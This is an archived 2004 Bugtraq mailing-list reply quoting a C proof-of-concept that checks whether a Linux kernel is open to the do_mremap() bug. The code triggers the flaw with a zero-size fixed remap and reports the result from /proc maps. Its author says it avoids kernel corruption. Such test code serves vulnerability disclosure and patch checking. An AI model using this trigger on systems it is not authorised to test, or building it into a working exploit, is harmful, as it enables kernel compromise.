lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <1073502832.4770.1.camel@crazy>
Date: 07 Jan 2004 21:13:51 +0200
From: D Lambrou <dlambrou@...zylinux.net>
To: Angelo Dell'Aera <buffer@...ifork.org>
Cc: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: Re: Linux kernel do_mremap() proof-of-concept exploit code


This version works on 
Linux 2.4.21 sparc64 as well .

Nice e?

On Wed, 2004-01-07 at 17:26, Angelo Dell'Aera wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> On Mon, 5 Jan 2004 22:22:39 +0100
> Christophe Devine <devine@....cnam.fr> wrote:
> 
> >The following program can be used to test if a x86 Linux system
> >is vulnerable to the do_mremap() exploit; use at your own risk.
> 
> This is an improved version of Christophe's code which can be used
> to test the vulnerability without corrupting any kernel data thus
> avoiding any kind of risk.
> 
> Regards.
> 
> 
> /*
>  * mremap_bug.c
>  * Creation date: 07.01.2004
>  * Copyright(c) 2004 Angelo Dell'Aera <buffer@...ifork.org>
>  * 
>  * This program is free software; you can redistribute it and/or modify
>  * it under the terms of the GNU General Public License as published by
>  * the Free Software Foundation; either version 2 of the License, or
>  * (at your option) any later version.
>  * 
>  * This program is distributed in the hope that it will be useful,
>  * but WITHOUT ANY WARRANTY; without even the implied warranty of
>  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
>  * GNU General Public License for more details.
>  * 
>  * You should have received a copy of the GNU General Public License
>  * along with this program; if not, write to the Free Software
>  * Foundation, Inc., 59 Temple Place, Suite 330, Boston,
>  * MA  02111-1307  USA
>  */
> 
> /* 
>  * Proof of concept code for testing do_mremap() Linux kernel bug.
>  * It is based on the code by Christophe Devine and Julien Tinnes
>  * posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since 
>  * it avoids any kernel data corruption.
>  *
>  * The following test was done against the Linux kernel 2.6.0. Similar 
>  * results were obtained against the kernel 2.4.23 and previous ones.
>  *
>  * buffer@...taka:~$ gcc -o mremap_bug mremap_bug.c
>  * buffer@...taka:~$ ./mremap_bug
>  *
>  * Base address : 0x60000000
>  * 
>  * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
>  * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
>  * 40016000-40017000 rw-p 00000000 00:00 0
>  * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
>  * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
>  * 40156000-40159000 rw-p 00000000 00:00 0
>  * 60000000-60002000 rw-p 00000000 00:00 0
>  * bfffd000-c0000000 rwxp ffffe000 00:00 0
>  * 
>  * Remapping at 0x70000000...
>  * 
>  * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
>  * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
>  * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
>  * 40016000-40017000 rw-p 00000000 00:00 0
>  * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
>  * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
>  * 40156000-40159000 rw-p 00000000 00:00 0
>  * 60000000-60002000 rw-p 00000000 00:00 0
>  * 70000000-70000000 rw-p 00000000 00:00 0
>  * bfffd000-c0000000 rwxp ffffe000 00:00 0
>  * 
>  * Report :
>  * This kernel appears to be VULNERABLE
>  *
>  * Segmentation fault
>  * buffer@...taka:~$
>  */
> 
> #define _GNU_SOURCE
> 
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <sys/types.h>
> #include <sys/mman.h>
> #include <sys/stat.h>
> #include <asm/unistd.h>
> #include <errno.h>
>   
> #define MREMAP_FIXED    2
> 
> #define PAGESIZE 4096
> #define VMASIZE  (2*PAGESIZE)
> #define BUFSIZE  8192
> 
> #define __NR_real_mremap __NR_mremap
> 
> static inline _syscall5( void *, real_mremap, void *, old_address,
>                          size_t, old_size, size_t, new_size,
>                          unsigned long, flags, void *, new_address );
> 
> #define MAPS_NO_CHECK 0
> #define MAPS_CHECK    1
> 
> int mremap_check = 0;
> 
> void maps_check(char *buf)
> {
> 	if (strstr(buf, "70000000"))
> 	    mremap_check++;
> }
> 
> void read_maps(int fd, char *path, unsigned long flag) 
> {
> 	ssize_t  nbytes;
>         char     buf[BUFSIZE];
> 
> 	if (lseek(fd, 0, SEEK_SET) < 0) {
> 		fprintf(stderr, "Unable to lseek %s\n", path);
> 		return;
> 	}
> 
> 	while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) {
> 
> 		if (flag & MAPS_CHECK)
> 			maps_check(buf);
> 
> 		if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
> 			fprintf(stderr, "Unable to read %s\n", path);
> 			exit (1);
> 		}
> 	}
> }
> 
> int main(int argc, char **argv)
> {
> 	void     *base;
> 	char     path[16];
> 	pid_t    pid;
> 	int      fd;
> 	
> 	pid = getpid();
> 	sprintf(path, "/proc/%d/maps", pid);
> 
> 	if ( !(fd = open(path, O_RDONLY))) {
> 		fprintf(stderr, "Unable to open %s\n", path);
> 		return 1;
> 	}
> 
> 	base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
> 		    MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
> 
> 	printf("\nBase address : 0x%x\n\n", base);
> 	read_maps(fd, path, MAPS_NO_CHECK);
> 
> 	printf("\nRemapping at 0x70000000...\n\n");
> 	base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
> 			   (void *)0x70000000);
> 
> 	read_maps(fd, path, MAPS_CHECK);
> 
> 	printf("\nReport : \n");
> 	(mremap_check) 
> 		? printf("This kernel appears to be VULNERABLE\n\n")
> 		: printf("This kernel appears to be NOT VULNERABLE\n\n");
> 
> 	close(fd);
> 	return 0;
> }
> 	
> 	
> 
> 
> 
> - --
> 
> Angelo Dell'Aera 'buffer' 
> Antifork Research, Inc.	  	http://buffer.antifork.org
> 
> PGP information in e-mail header
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
> 
> iD8DBQE//CUkpONIzxnBXKIRAoeMAJ9QruC6owY23yP9atS3LpDbxgioEACeIjeO
> Vl8MbPxJEbIrPb7iE47qVd0=
> =4Hue
> -----END PGP SIGNATURE-----
> ----
> 

> ----------------------------------------- (from cyetz)
> 
> E-Mail Disclaimer Notice:
> 
> 
> 
> This email is confidential and intended solely for the use of the individual to whom it is addressed.If you are not the intended recipient, be advised that you have received this email in error and that any use, dissemination, forwarding, printing, or copying of this email is strictly prohibited.
> 
> 
> ---------------------------------------------------------
-- 
---------------------------------------------------------
D Lambrou
http://crazylinux.net

You can always get my public key block from
http://crazylinux.net/public.asc
Fingerprint: C7B3 A112 3704 7202 2B33  6B28 5418 78DD 774A 7BCB



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ